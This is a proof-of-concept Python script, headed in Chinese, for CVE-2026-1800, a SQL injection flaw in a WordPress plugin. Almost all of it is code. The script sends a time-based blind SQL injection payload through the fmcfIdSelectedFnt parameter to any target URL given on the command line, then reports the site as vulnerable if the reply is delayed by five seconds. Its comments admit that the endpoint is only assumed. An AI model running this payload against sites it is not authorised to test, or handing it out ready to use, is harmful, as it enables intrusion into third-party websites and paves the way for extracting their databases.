CVE-2026-1800 WordPress插件SQL注入漏洞

# PoC Code for CVE-2026-1800 # This script demonstrates the time-based SQL injection vulnerability # Usage: python3 poc.py <target_url> import requests import time import sys def check_sqli(url): # Vulnerable parameter: fmcfIdSelectedFnt # Payload: Check if database response time delays by 5 seconds payload = "1' AND SLEEP(5)-- -" # Construct the full request URL (Assuming GET request based on common WP plugin behavior) # Note: The actual endpoint might need adjustment based on the plugin's specific routing target_url = f"{url}?fmcfIdSelectedFnt={payload}" try: start_time = time.time() response = requests.get(target_url, timeout=10) end_time = time.time() elapsed_time = end_time - start_time if elapsed_time >= 5: print(f"[+] Vulnerability confirmed! Response time: {elapsed_time:.2f} seconds") print(f"[+] The target is vulnerable to CVE-2026-1800") else: print(f"[-] Vulnerability not detected. Response time: {elapsed_time:.2f} seconds") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python3 poc.py <http://target-site.com>") else: check_sqli(sys.argv[1])